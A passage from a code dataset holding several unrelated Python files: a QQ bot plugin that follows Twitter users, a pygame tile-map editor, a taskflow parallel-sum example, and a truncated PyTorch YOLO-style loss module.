flags=0):\n await session.send(\"用户名/用户ID 只能包含字母、数字或下划线\")\n return\n try:\n if stripped_arg.isdecimal():\n userinfo = tweetListener.api.get_user(user_id = int(stripped_arg))\n else:\n userinfo = tweetListener.api.get_user(screen_name = stripped_arg)\n except TweepError:\n s = traceback.format_exc(limit=5)\n tweetListener.log_print(3,'推Py错误:'+s)\n await session.send(\"查询不到信息,bksn\")\n return\n tweetListener.myStreamListener.seve_image(userinfo.screen_name,userinfo.profile_image_url_https,'userinfo')\n file_suffix = os.path.splitext(userinfo.profile_image_url_https)[1]\n res = push_list.delPushunitFromPushToAndTweetUserID(\n session.event['message_type'],\n session.event[('group_id' if session.event['message_type'] == 'group' else 'user_id')],\n userinfo.id\n )\n s = '用户UID:'+ str(userinfo.id) + \"\\n\" + \\\n '用户ID:' + userinfo.screen_name + \"\\n\" + \\\n '用户昵称:' + userinfo.name + \"\\n\" + \\\n '头像:' + '[CQ:image,file=userinfo/' + userinfo.screen_name + file_suffix + ']'+ \"\\n\" + \\\n ('此用户已移出监听列表' if res[0] == True else '移除失败:'+res[1])\n await session.send(s)\n\n@on_command('addone',aliases=['给俺D一个'],permission=permission.SUPERUSER,only_to_me = True)\nasync def addOne(session: CommandSession):\n stripped_arg = session.current_arg_text.strip()\n if stripped_arg == '':\n await session.send(\"缺少参数\")\n return\n if stripped_arg == re.match('[A-Za-z0-9_]+', stripped_arg, flags=0):\n await session.send(\"用户名/用��ID 只能包含字母、数字或下划线\")\n return\n cs = commandHeadtail(stripped_arg)\n try:\n if cs[0].isdecimal():\n userinfo = tweetListener.api.get_user(user_id = int(cs[0]))\n else:\n userinfo = tweetListener.api.get_user(screen_name = cs[0])\n except TweepError:\n s = traceback.format_exc(limit=5)\n tweetListener.log_print(3,'推Py错误:'+s)\n await session.send(\"查询不到信息,你D都能D歪来\")\n return\n tweetListener.myStreamListener.seve_image(userinfo.screen_name,userinfo.profile_image_url_https,'userinfo')\n file_suffix = os.path.splitext(userinfo.profile_image_url_https)[1]\n nick = ''\n des = ''\n if cs[2] != '':\n cs = commandHeadtail(cs[2])\n nick = cs[0]\n des = cs[2]\n PushUnit = push_list.baleToPushUnit(\n session.event['self_id'],\n session.event['message_type'],\n session.event[('group_id' if session.event['message_type'] == 'group' else 'user_id')],\n userinfo.id,des,nick = nick\n )\n res = push_list.addPushunit(PushUnit)\n s = 
'用户UID:'+ str(userinfo.id) + \"\\n\" + \\\n '用户ID:' + userinfo.screen_name + \"\\n\" + \\\n '用户昵称:' + userinfo.name + \"\\n\" + \\\n '头像:' + '[CQ:image,file=userinfo/' + userinfo.screen_name + file_suffix + ']'+ \"\\n\" + \\\n ('此用户已添加至监听列表' if res[0] == True else '添加失败:'+res[1])\n await session.send(s)\n\n\n#推特ID编码解码\n#解码成功返回推特ID,失败返回-1\ndef decode_b64(str) -> int:\n table = {\"0\": 0, \"1\": 1, \"2\": 2, \"3\": 3, \"4\": 4, \"5\": 5,\n \"6\": 6, \"7\": 7, \"8\": 8, \"9\": 9,\n \"a\": 10, \"b\": 11, \"c\": 12, \"d\": 13, \"e\": 14, \"f\": 15, \"g\": 16,\n \"h\": 17, \"i\": 18, \"j\": 19, \"k\": 20, \"l\": 21, \"m\": 22, \"n\": 23,\n \"o\": 24, \"p\": 25, \"q\": 26, \"r\": 27, \"s\": 28, \"t\": 29, \"u\": 30,\n \"v\": 31, \"w\": 32, \"x\": 33, \"y\": 34, \"z\": 35,\n \"A\": 36, \"B\": 37, \"C\": 38, \"D\": 39, \"E\": 40, \"F\": 41, \"G\": 42,\n \"H\": 43, \"I\": 44, \"J\": 45, \"K\": 46, \"L\": 47, \"M\": 48, \"N\": 49,\n \"O\": 50, \"P\": 51, \"Q\": 52, \"R\": 53, \"S\": 54, \"T\": 55, \"U\": 56,\n \"V\": 57, \"W\": 58, \"X\": 59, \"Y\": 60, \"Z\": 61,\n \"$\": 62, \"_\": 63}\n result : int = 0\n for i in range(len(str)):\n result *= 64\n if str[i] not in table:\n return -1\n result += table[str[i]]\n return result + 1253881609540800000\n@on_command('detweetid',only_to_me = False)\nasync def decodetweetid(session: CommandSession):\n stripped_arg = session.current_arg_text.strip()\n if stripped_arg == '':\n return\n res = decode_b64(stripped_arg)\n if res == -1:\n await session.send(\"缩写推特ID不正确\")\n return\n await session.send(\"推特ID为:\"+str(res))\n #parameter = commandHeadtail(stripped_arg)\n@on_command('entweetid',only_to_me = False)\nasync def encodetweetid(session: CommandSession):\n stripped_arg = session.current_arg_text.strip()\n if stripped_arg == '':\n return\n if not stripped_arg.isdecimal():\n await session.send(\"推特ID不正确\")\n return\n res = tweetListener.encode_b64(int(stripped_arg))\n await session.send(\"推特ID缩写为:\"+res)\n #parameter = commandHeadtail(stripped_arg)\n\n\"\"\"\n\t'font': 8250736, \n 'message': [{'type': 'text', 'data': {'text': '!getpushlist'}}], \n 'message_id': 436, \n 'message_type': 'private', \n 'post_type': 'message', \n 'raw_message': '!getpushlist', \n 'self_id': 1837730674, \n 'sender': {'age': 20, 'nickname': '晨轩°', 'sex': 'male', 'user_id': 3309003591}, \n 'sub_type': 'friend', \n 'time': 1587967443, \n 'user_id': 3309003591, \n 'to_me': True}\n\"\"\"","sub_path":"plugins/twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":10852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
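decode_b64 above implies a 64-symbol alphabet (digits, lowercase, uppercase, "$", "_") plus the fixed offset 1253881609540800000. The plugin calls tweetListener.encode_b64 for the reverse direction; assuming that function is simply the inverse of decode_b64, it could look like the hedged sketch below (the round trip relies on decode_b64 as defined above).

ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$_"

def encode_b64(tweet_id: int) -> str:
    n = tweet_id - 1253881609540800000
    if n < 0:
        raise ValueError("tweet id predates the encodable range")
    digits = ""
    while True:
        n, rem = divmod(n, 64)
        digits = ALPHABET[rem] + digits
        if n == 0:
            return digits

assert decode_b64(encode_b64(1253881609540800123)) == 1253881609540800123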
+{"seq_id":"489878604","text":"#coding:utf-8\nimport random,pygame,os\nfrom pygame.locals import *\nfrom lib import *\n\ndef aff(cam,mape,terrains,imgterrains,t,pos,cx,cy,tcrs,tptsel,er):\n bts=[]\n for x in range(10): bts.append(None)\n fenetre.fill((0,0,0))\n #map\n for x in range(-cam[0],-cam[0]+int(tex/t)):\n for y in range(-cam[1],-cam[1]+int(tey/t)):\n if x>0 and y>0 and x < mape.shape[0]-1 and y < mape.shape[1]-1:\n mm=mape[x,y]\n if mm>len(terrains)-1:\n mm=0\n if terrains[mm]==\"eau\":\n lc=getopsmca([terrains.index(\"eau\"),terrains.index(\"eau_profonde\"),terrains.index(\"eau_peu_profonde\")],x,y,mape)\n # 0,0=no 1,0=n 2,0=ne 0,1=o 1,1=c 2,1=e 0,2=so 1,2=s 2,2=se\n no,n,ne,o,e,so,s,se=lc[0,0],lc[1,0],lc[2,0],lc[0,1],lc[2,1],lc[0,2],lc[1,2],lc[2,2]\n fenetre.blit(imgterrains[terrains.index(\"herbe\")],[(cam[0]+x)*t,(cam[1]+y)*t])\n fenetre.blit(er[0][0],[(cam[0]+x)*t,(cam[1]+y)*t])\n if no: fenetre.blit(er[0][1],[(cam[0]+x)*t,(cam[1]+y)*t])\n if n: fenetre.blit(er[0][2],[(cam[0]+x)*t,(cam[1]+y)*t])\n if ne: fenetre.blit(er[0][3],[(cam[0]+x)*t,(cam[1]+y)*t])\n if o: fenetre.blit(er[0][4],[(cam[0]+x)*t,(cam[1]+y)*t])\n if e: fenetre.blit(er[0][5],[(cam[0]+x)*t,(cam[1]+y)*t])\n if so: fenetre.blit(er[0][6],[(cam[0]+x)*t,(cam[1]+y)*t])\n if s: fenetre.blit(er[0][7],[(cam[0]+x)*t,(cam[1]+y)*t])\n if se: fenetre.blit(er[0][8],[(cam[0]+x)*t,(cam[1]+y)*t])\n elif terrains[mm]==\"eau_profonde\":\n lc=getopsmca([terrains.index(\"eau\"),terrains.index(\"eau_profonde\"),terrains.index(\"eau_peu_profonde\")],x,y,mape)\n # 0,0=no 1,0=n 2,0=ne 0,1=o 1,1=c 2,1=e 0,2=so 1,2=s 2,2=se\n no,n,ne,o,e,so,s,se=lc[0,0],lc[1,0],lc[2,0],lc[0,1],lc[2,1],lc[0,2],lc[1,2],lc[2,2]\n fenetre.blit(imgterrains[terrains.index(\"herbe\")],[(cam[0]+x)*t,(cam[1]+y)*t])\n fenetre.blit(er[1][0],[(cam[0]+x)*t,(cam[1]+y)*t])\n if no: fenetre.blit(er[1][1],[(cam[0]+x)*t,(cam[1]+y)*t])\n if n: fenetre.blit(er[1][2],[(cam[0]+x)*t,(cam[1]+y)*t])\n if ne: fenetre.blit(er[1][3],[(cam[0]+x)*t,(cam[1]+y)*t])\n if o: fenetre.blit(er[1][4],[(cam[0]+x)*t,(cam[1]+y)*t])\n if e: fenetre.blit(er[1][5],[(cam[0]+x)*t,(cam[1]+y)*t])\n if so: fenetre.blit(er[1][6],[(cam[0]+x)*t,(cam[1]+y)*t])\n if s: fenetre.blit(er[1][7],[(cam[0]+x)*t,(cam[1]+y)*t])\n if se: fenetre.blit(er[1][8],[(cam[0]+x)*t,(cam[1]+y)*t])\n elif terrains[mm]==\"route\":\n lc=getopsmca([terrains.index(\"route\")],x,y,mape)\n # 0,0=no 1,0=n 2,0=ne 0,1=o 1,1=c 2,1=e 0,2=so 1,2=s 2,2=se\n no,n,ne,o,e,so,s,se=lc[0,0],lc[1,0],lc[2,0],lc[0,1],lc[2,1],lc[0,2],lc[1,2],lc[2,2]\n fenetre.blit(imgterrains[terrains.index(\"herbe\")],[(cam[0]+x)*t,(cam[1]+y)*t])\n if no: fenetre.blit(er[2][1],[(cam[0]+x)*t,(cam[1]+y)*t])\n if n: fenetre.blit(er[2][2],[(cam[0]+x)*t,(cam[1]+y)*t])\n if ne: fenetre.blit(er[2][3],[(cam[0]+x)*t,(cam[1]+y)*t])\n if o: fenetre.blit(er[2][4],[(cam[0]+x)*t,(cam[1]+y)*t])\n if e: fenetre.blit(er[2][5],[(cam[0]+x)*t,(cam[1]+y)*t])\n if so: fenetre.blit(er[2][6],[(cam[0]+x)*t,(cam[1]+y)*t])\n if s: fenetre.blit(er[2][7],[(cam[0]+x)*t,(cam[1]+y)*t])\n if se: fenetre.blit(er[2][8],[(cam[0]+x)*t,(cam[1]+y)*t])\n elif terrains[mm]==\"eau_peu_profonde\":\n lc=getopsmca([terrains.index(\"eau\"),terrains.index(\"eau_profonde\"),terrains.index(\"eau_peu_profonde\")],x,y,mape)\n # 0,0=no 1,0=n 2,0=ne 0,1=o 1,1=c 2,1=e 0,2=so 1,2=s 2,2=se\n no,n,ne,o,e,so,s,se=lc[0,0],lc[1,0],lc[2,0],lc[0,1],lc[2,1],lc[0,2],lc[1,2],lc[2,2]\n fenetre.blit(imgterrains[terrains.index(\"herbe\")],[(cam[0]+x)*t,(cam[1]+y)*t])\n fenetre.blit(er[3][0],[(cam[0]+x)*t,(cam[1]+y)*t])\n if no: 
fenetre.blit(er[3][1],[(cam[0]+x)*t,(cam[1]+y)*t])\n                    if n: fenetre.blit(er[3][2],[(cam[0]+x)*t,(cam[1]+y)*t])\n                    if ne: fenetre.blit(er[3][3],[(cam[0]+x)*t,(cam[1]+y)*t])\n                    if o: fenetre.blit(er[3][4],[(cam[0]+x)*t,(cam[1]+y)*t])\n                    if e: fenetre.blit(er[3][5],[(cam[0]+x)*t,(cam[1]+y)*t])\n                    if so: fenetre.blit(er[3][6],[(cam[0]+x)*t,(cam[1]+y)*t])\n                    if s: fenetre.blit(er[3][7],[(cam[0]+x)*t,(cam[1]+y)*t])\n                    if se: fenetre.blit(er[3][8],[(cam[0]+x)*t,(cam[1]+y)*t])\n                else:\n                    imap=imgterrains[mm]\n                    fenetre.blit(imap,[(cam[0]+x)*t,(cam[1]+y)*t])\n    for xx in range(cam[0]+cx-1-int(tcrs),cam[0]+cx+int(tcrs)):\n        for yy in range(cam[1]+cy-1-int(tcrs),cam[1]+cy+int(tcrs)):\n            pygame.draw.rect(fenetre,(0,0,255),((xx-cam[0])*t,(yy-cam[1])*t,t,t),3)\n    button(10,10,125,500,(50,40,0),(100,80,10))\n    fenetre.blit(pygame.transform.scale(imgterrains[tptsel],[rx(100),ry(100)]),[rx(15),ry(15)])\n    texte(terrains[tptsel],20,125,20,(255,255,155))\n    ct=8\n    button(20,180,10*ct,5,(150,150,150),(0,0,0))\n    button(20+(tcrs*ct),170,5,25,(200,200,200),(0,0,0))\n    bts[0]=button(20,300,100,35,(95,55,5),(0,0,0))\n    texte(\"map size X : \"+str(mape.shape[0]),25,305,15,(255,255,255))\n    bts[1]=button(20,350,100,35,(95,55,5),(0,0,0))\n    texte(\"map size Y : \"+str(mape.shape[1]),25,355,15,(255,255,255))\n    bts[2]=button(20,400,100,35,(95,55,5),(0,0,0))\n    texte(\"save\",25,405,15,(255,255,255))\n    pygame.display.update()\n    return bts\n\ndef quitter(encour):\n    encour=False\n    return encour\n\ndef main():\n    cam=[0,0]\n    encoure=True\n    needtoaff=True\n    t=30\n    terrains=load_t()\n    imgterrains=load_ti(pygame,t)\n    er=precharger_img_er(t)\n    mtx,mty=40,40\n    mape=numpy.zeros([mtx,mty],dtype=int)\n    nbh=gett(terrains,'herbe')\n    for x in range(mtx):\n        for y in range(mty):\n            mape[x,y]=nbh\n    d=1\n    tptsel=0\n    tcrs=0\n    while encoure:\n        if True: # needtoaff:\n            pos=pygame.mouse.get_pos()\n            cx=int(pos[0]/t)+1\n            cy=int(pos[1]/t)+1\n            bts=aff(cam,mape,terrains,imgterrains,t,pos,cx,cy,tcrs,tptsel,er)\n            #needtoaff=False\n        sp=pygame.mouse.get_pressed()\n        if sp[0]==1 :\n            for xx in range(cx-1-tcrs,cx+tcrs):\n                for yy in range(cy-1-tcrs,cy+tcrs):\n                    cxx,cyy=xx-cam[0],yy-cam[1]\n                    if cxx >= 0 and cxx < mape.shape[0] and cyy >= 0 and cyy < mape.shape[1]:\n                        mape[cxx,cyy]=tptsel\n        elif sp[2]==1:\n            for xx in range(cx-1-tcrs,cx+tcrs):\n                for yy in range(cy-1-tcrs,cy+tcrs):\n                    cxx,cyy=xx-cam[0],yy-cam[1]\n                    if cxx >= 0 and cxx < mape.shape[0] and cyy >= 0 and cyy < mape.shape[1]:\n                        mape[cxx,cyy]=nbh\n        for event in pygame.event.get():\n            if event.type==QUIT: encoure=quitter(encoure)\n            elif event.type==KEYDOWN:\n                needtoaff=True\n                if event.key==K_ESCAPE: encoure=quitter(encoure)\n                elif event.key==K_UP:\n                    cam[1]+=d\n                elif event.key==K_DOWN:\n                    cam[1]-=d\n                elif event.key==K_LEFT:\n                    cam[0]+=d\n                elif event.key==K_RIGHT:\n                    cam[0]-=d\n                elif event.key==K_KP8:\n                    if tptsel<len(terrains)-1: tptsel+=1\n                elif event.key==K_KP2:\n                    if tptsel>0: tptsel-=1\n                elif event.key==K_t:\n                    t+=1\n                    imgterrains=load_ti(pygame,t)\n                elif event.key==K_g and t > 5:\n                    t-=1\n                    imgterrains=load_ti(pygame,t)\n            elif event.type==MOUSEBUTTONDOWN:\n                needtoaff=True\n                pos=pygame.mouse.get_pos()\n                rpos=pygame.Rect(pos[0],pos[1],1,1)\n                isonbutton=False\n                for b in bts:\n                    if b!=None and rpos.colliderect(b):\n                        isonbutton=True\n                        di=bts.index(b)\n                        if di==0:\n                            try:\n                                nx=int(rentre_texte(\"new Y map size : \"))\n                                nmape=numpy.zeros([nx,mape.shape[1]],dtype=int)\n                                for x in 
range(nmape.shape[0]):\n for y in range(nmape.shape[1]):\n nmape[x,y]=mape[x,y]\n mape=nmape\n except: pass\n elif di==2:\n nm=rentre_texte(\"map name : \")+\".nath\"\n save_mape(mape,nm)\n if not isonbutton:\n if event.button == 4:\n if tcrs < 10 : tcrs+=1\n elif event.button == 5:\n if tcrs > 0 : tcrs-=1\n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"create_map.py","file_name":"create_map.py","file_ext":"py","file_size_in_byte":10238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
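
The aff() routine in the record above draws water and road transitions by testing the eight neighbours of each tile and blitting an edge sprite for every neighbour that differs. The helper getopsmca lives in the project's lib module and is not shown here, so the sketch below is only an assumed equivalent of that neighbour-mask step, not the original implementation.

import numpy as np

def neighbour_mask(kinds, x, y, mape):
    # 3x3 boolean mask: True where the adjacent cell is NOT one of the given
    # terrain ids, i.e. where a transition/edge tile is needed.
    # Assumes 0 < x < mape.shape[0]-1 and 0 < y < mape.shape[1]-1, which is
    # exactly the guard aff() applies before reading neighbours.
    lc = np.zeros((3, 3), dtype=bool)
    for dx in (-1, 0, 1):
        for dy in (-1, 0, 1):
            lc[dx + 1, dy + 1] = mape[x + dx, y + dy] not in kinds
    return lc
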
+{"seq_id":"547905877","text":"import contextlib\r\nimport time\r\nfrom taskflow import engines\r\nfrom taskflow.patterns import linear_flow\r\nfrom taskflow.patterns import unordered_flow\r\nfrom taskflow import task\r\n\r\n\r\n@contextlib.contextmanager\r\ndef show_time(name):\r\n print(\">>>'{}' flow will start ...\".format(name))\r\n start = time.time()\r\n yield\r\n end = time.time()\r\n print(\">>>'{0}' flow end. took {1:.3f}s\".format(name, end - start))\r\n\r\n\r\nclass SumSlice(task.Task):\r\n def execute(self, inputs):\r\n return sum(inputs)\r\n\r\n\r\nclass SumSlices(task.Task):\r\n def execute(self, *args, **kwargs):\r\n return sum(kwargs.values())\r\n\r\n\r\n# Chunk a collection. elem_list: the elements, chunk_size: size of each chunk\r\ndef slice_iter(chunk_size, elem_list):\r\n chunk = []\r\n for elem in elem_list:\r\n chunk.append(elem)\r\n if len(chunk) == chunk_size:\r\n yield chunk\r\n chunk = []\r\n\r\n if len(chunk):\r\n yield chunk\r\n\r\n return None\r\n\r\n\r\nelem_list = range(0, 10 ** 5)\r\nslice_size = 10 ** 4\r\n\r\nlflow = linear_flow.Flow(\"root\") # runs uflow, then SumSlices()\r\nstore = {} # holds the input data for each slice\r\nprovided = [] # the \"identifiers\" bound to each slice's partial result\r\nuflow = unordered_flow.Flow('map') # runs the per-slice SumSlice() tasks\r\nGr = slice_iter(slice_size, elem_list) # generator whose items are \"slices\"\r\n\r\n# note: the fewer tasks, the better\r\nfor i, _slice in enumerate(Gr):\r\n slice_name = 'slice_{}'.format(i)\r\n store[slice_name] = _slice\r\n provided.append(\"result_{}\".format(i))\r\n\r\n # these run in parallel: input 'slice_n', output 'result_n'\r\n uflow.add(SumSlice(name=slice_name, rebind={'inputs': slice_name}, provides=provided[-1]))\r\n\r\nlflow.add(\r\n # execute(name) resolves 'name' automatically: 1. from store={'name': val} given to engines.load 2. from another task's output, if that task has provides='name'\r\n # execute(name) stores its result automatically: 1. under the task name in the engine.storage object 2. as input to other tasks, if provides='name'\r\n # rebind={'name': 'myName'}\r\n # rebind=['myName'] same as above, rebinds the parameter\r\n uflow,\r\n\r\n # requires=['result_1', 'result_2', ...]\r\n # i.e. look up 'result_1', 'result_2', ... in [store={}, other tasks' outputs] and pass them as [keyword arguments] to execute(self, *args, **kwargs)\r\n SumSlices(name='total_sum', requires=provided)\r\n)\r\n\r\nengine = engines.load(lflow, engine='parallel', store=store, max_workers=1)\r\nwith show_time(lflow.name.title()):\r\n engine.run()\r\n\r\nassert engine.storage.get('total_sum') == sum(elem_list)\r\n","sub_path":"python/taskflow/my-example/deal_list_elem.py","file_name":"deal_list_elem.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
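
Stripped of the taskflow machinery, the record above is a chunked map-reduce. This plain-Python restatement (added for clarity, not part of the original file) makes the store/provides/requires wiring concrete: each 'result_i' is the sum of 'slice_i', and 'total_sum' folds the partial results.

elems = list(range(0, 10 ** 5))
chunks = [elems[i:i + 10 ** 4] for i in range(0, len(elems), 10 ** 4)]
partials = {"result_{}".format(i): sum(c) for i, c in enumerate(chunks)}  # the uflow stage
total_sum = sum(partials.values())                                        # the SumSlices stage
assert total_sum == sum(elems)
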
+{"seq_id":"492666425","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torch.autograd import Variable\r\nfrom utilities import input_to_box, output_to_box, get_iou, get_iou_torch, tensor2im\r\n\r\ndef simple_loss(outputs, labels, print_losses = False):\r\n loss = 0.0\r\n xy_loss = 0.0\r\n wh_loss = 0.0\r\n mse_loss = nn.MSELoss()\r\n #scale = torch.tensor([640.0,480.0]).cuda()\r\n scale = torch.tensor([1.0,1.0]).cuda()\r\n for i in range(outputs.size()[0]):\r\n box_coords = labels[i]\r\n xy_loss += mse_loss((outputs[i, :2]),(labels[i][:2]*scale))\r\n wh_loss += mse_loss((outputs[i, 2:4]),(labels[i][2:4]*scale))\r\n \r\n iou = 0.0\r\n for i in range(outputs.size()[0]):\r\n box_coords = labels[i]\r\n in_box = input_to_box(labels[i])\r\n out_box = input_to_box(outputs[i])\r\n iou += get_iou(in_box, out_box)\r\n\r\n iou /= outputs.size()[0]\r\n xy_loss = xy_loss/(outputs.size()[0])\r\n wh_loss = wh_loss/(outputs.size()[0])\r\n\r\n loss += xy_loss + wh_loss\r\n \r\n if print_losses:\r\n print(f'xy loss : {xy_loss}, wh loss : {wh_loss}')\r\n\r\n return loss, xy_loss, wh_loss, iou\r\n\r\n\r\ndef yolo_loss(outputs, labels, print_losses=False):\r\n # 8 X 5 X 15 X 20\r\n l_coord = 5\r\n l_noobj = 0.5\r\n\r\n pwhs = [[0.5, 1], [1.0,1.0], [1,0.5]]\r\n\r\n loss = 0.0\r\n xy_loss = 0.0\r\n wh_loss = 0.0\r\n obj_loss = 0.0\r\n box_no = 0\r\n #pwh = torch.tensor([4.0,3.0]).cuda()\r\n for i in range(outputs.size()[0]):\r\n \r\n box_coords = labels[i]\r\n x_grid = torch.floor(box_coords[0]*outputs.size()[3])\r\n x_off = box_coords[0]*outputs.size()[3]-x_grid\r\n y_grid = torch.floor(box_coords[1]*outputs.size()[2])\r\n y_off = box_coords[1]*outputs.size()[2]-y_grid\r\n\r\n x_grid = x_grid.long()\r\n y_grid = y_grid.long()\r\n\r\n box_aspect = box_coords[3]/box_coords[2]\r\n if box_aspect <= 3/4.0:\r\n box_no = 0\r\n pwh = torch.tensor(pwhs[0]).cuda()\r\n elif box_aspect >= 4/3.0:\r\n box_no = 2\r\n pwh = torch.tensor(pwhs[2]).cuda()\r\n else:\r\n box_no = 1\r\n pwh = torch.tensor(pwhs[1]).cuda()\r\n\r\n #ideal_out[1,:4,y_grid,x_grid] = torch.tensor([x_off, y_off, box_coords[2], box_coords[3]])\r\n Sigmoid = nn.Sigmoid()\r\n\r\n #pred_xy = torch.mul((Sigmoid(outputs[i, :2, y_grid, x_grid]) + torch.tensor([x_grid, y_grid]).float().cuda()), torch.tensor([1.0, 1.0]).cuda())\r\n pred_xy = Sigmoid(outputs[i, (box_no*5):(box_no*5 + 2), y_grid, x_grid])\r\n actual_xy = torch.tensor([x_off, y_off]).cuda()\r\n #actual_xy = torch.tensor([(box_coords[0] * 640/20), (box_coords[1] * 480/15)]).cuda()\r\n xy_loss += l_coord* ((pred_xy-actual_xy)**2).sum()\r\n\r\n actual_wh = torch.tensor([(box_coords[2]), (box_coords[3])]).cuda()\r\n pred_wh = torch.mul((Sigmoid(outputs[i, (box_no*5 + 2):(box_no*5 + 4), y_grid, x_grid])), pwh)\r\n wh_loss += l_coord* ((pred_wh-actual_wh)**2).sum()\r\n \r\n ideal_out = torch.zeros(1, 3, outputs.size()[2], outputs.size()[3])\r\n ideal_out[0,box_no,y_grid,x_grid] = torch.tensor([1.0])\r\n ideal_out = ideal_out.cuda()\r\n bce_loss = nn.BCELoss()\r\n bce_loss_sum = nn.BCELoss(size_average =False)\r\n\r\n obj_loss += (1)*(bce_loss(Sigmoid(outputs[i,(box_no*5 + 4),y_grid,x_grid]),ideal_out[0,box_no,y_grid,x_grid])) \r\n for j in range(3):\r\n obj_loss += (l_noobj)*(bce_loss_sum(Sigmoid(outputs[i,(j*5 + 4),:,:]),ideal_out[0,j,:,:]))\r\n obj_loss -= (l_noobj)*bce_loss(Sigmoid(outputs[i,(box_no*5 + 4),y_grid,x_grid]),ideal_out[0,box_no,y_grid,x_grid])\r\n\r\n iou = 0.0\r\n for i in range(outputs.size()[0]):\r\n box_coords = labels[i]\r\n box_aspect = 
box_coords[3]/box_coords[2]\r\n if box_aspect <= 3/4.0:\r\n box_no = 0\r\n pwh = torch.tensor(pwhs[0]).cuda()\r\n elif box_aspect >= 4/3.0:\r\n box_no = 2\r\n pwh = torch.tensor(pwhs[2]).cuda()\r\n else:\r\n box_no = 1\r\n pwh = torch.tensor(pwhs[1]).cuda()\r\n in_box = input_to_box(labels[i])\r\n x_grid = torch.floor(box_coords[0]*outputs.size()[3])\r\n y_grid = torch.floor(box_coords[1]*outputs.size()[2])\r\n x_grid = x_grid.long()\r\n y_grid = y_grid.long()\r\n grid = [int(x_grid.item()), int(y_grid.item())]\r\n\r\n output = nn.Sigmoid()(outputs[i,box_no*5: (box_no*5+4),y_grid,x_grid])\r\n output[2:4] = torch.mul(output[2:4], pwh)\r\n out_box = output_to_box(grid, output)\r\n iou += get_iou(in_box, out_box)\r\n\r\n iou /= outputs.size()[0]\r\n xy_loss = xy_loss/(outputs.size()[0])\r\n wh_loss = wh_loss/(outputs.size()[0])\r\n obj_loss = obj_loss/(outputs.size()[0])\r\n\r\n loss = xy_loss + wh_loss + obj_loss\r\n #loss /= 10\r\n #loss = obj_loss\r\n if print_losses:\r\n print(f'xy loss : {xy_loss}, wh loss : {wh_loss}, obj loss : {obj_loss}')\r\n\r\n return loss, xy_loss, wh_loss, obj_loss, iou\r\n\r\n\r\nclass FocalLoss(nn.Module):\r\n def __init__(self, alpha=1, gamma=2, logits=False, reduce=True):\r\n super(FocalLoss, self).__init__()\r\n self.alpha = alpha\r\n self.gamma = gamma\r\n self.logits = logits\r\n self.reduce = reduce\r\n\r\n def forward(self, inputs, targets, iou):\r\n if self.logits:\r\n BCE_loss = F.binary_cross_entropy_with_logits(inputs, targets, reduce=False)\r\n else:\r\n BCE_loss = F.binary_cross_entropy(inputs, targets, reduce=False)\r\n pt = torch.exp(-BCE_loss)\r\n F_loss = self.alpha * (iou-pt)**self.gamma * BCE_loss\r\n\r\n if self.reduce:\r\n return torch.mean(F_loss)\r\n else:\r\n return torch.sum(F_loss)\r\n\r\ndef new_loss(outputs, labels, print_losses=False, verbose = False):\r\n # 8 X 5 X 15 X 20\r\n l_wh = 1\r\n l_xy = 1\r\n l_obj = 1\r\n l_noobj = 0.5\r\n\r\n \"\"\"[[270.29843406 301.07493206]\r\n [514.08074771 208.01640387]\r\n [550.88115632 386.20782774]]\"\"\"\r\n\r\n \"\"\"\r\n [[399.57132883 385.37886898]\r\n [377.97266881 202.91869545]\r\n [199.60422234 305.24078033]\r\n [560.06322625 218.35645933]\r\n [586.74791377 391.02851182]]\r\n\r\n \"\"\"\r\n pwhs = [[0.624, 0.80],[0.59, 0.423],[0.312, 0.636],[0.875, 0.455],[0.9168, 0.815]]\r\n #pwhs = [[0.422, 0.6272], [0.8,0.4333], [0.86,0.80]]\r\n\r\n loss = 0.0\r\n xy_loss = 0.0\r\n wh_loss = 0.0\r\n obj_loss = 0.0\r\n iou = 0.0\r\n #pwh = torch.tensor([4.0,3.0]).cuda()\r\n def anchor_iou(b1, b2):\r\n overlap = min(b1[0], b2[0])*min(b1[1], b2[1])\r\n total_area = b1[0]*b1[1] + b2[0]*b2[1]\r\n return overlap/(total_area-overlap)\r\n\r\n\r\n Sigmoid = nn.Sigmoid()\r\n focal_loss = FocalLoss(reduce = False)\r\n focal_loss_mean = FocalLoss(reduce = True)\r\n bce_loss = nn.BCELoss()\r\n bce_loss_mean = nn.BCELoss(size_average =True)\r\n\r\n l1loss = nn.L1Loss()\r\n\r\n for i in range(outputs.size()[0]):\r\n anchors = []\r\n anchors_ioupass = []\r\n box_coords = labels[i]\r\n max_iou = 0\r\n max_id = 0\r\n for j in range(len(pwhs)):\r\n iou_anch = anchor_iou([box_coords[2],box_coords[3]],pwhs[j])\r\n if iou_anch > max_iou:\r\n max_iou = iou_anch\r\n max_id = j\r\n if iou_anch > 0.5:\r\n anchors_ioupass.append(j)\r\n \r\n #if len(anchors) == 0:\r\n anchors.append(max_id)\r\n\r\n if verbose:\r\n print(f' \\n\\n{box_coords}')\r\n\r\n def pred_iou(pred, target):\r\n if verbose:\r\n print(f'iou_coords {pred} , {target} ______')\r\n return get_iou_torch(pred, target)\r\n\r\n x_grid = 
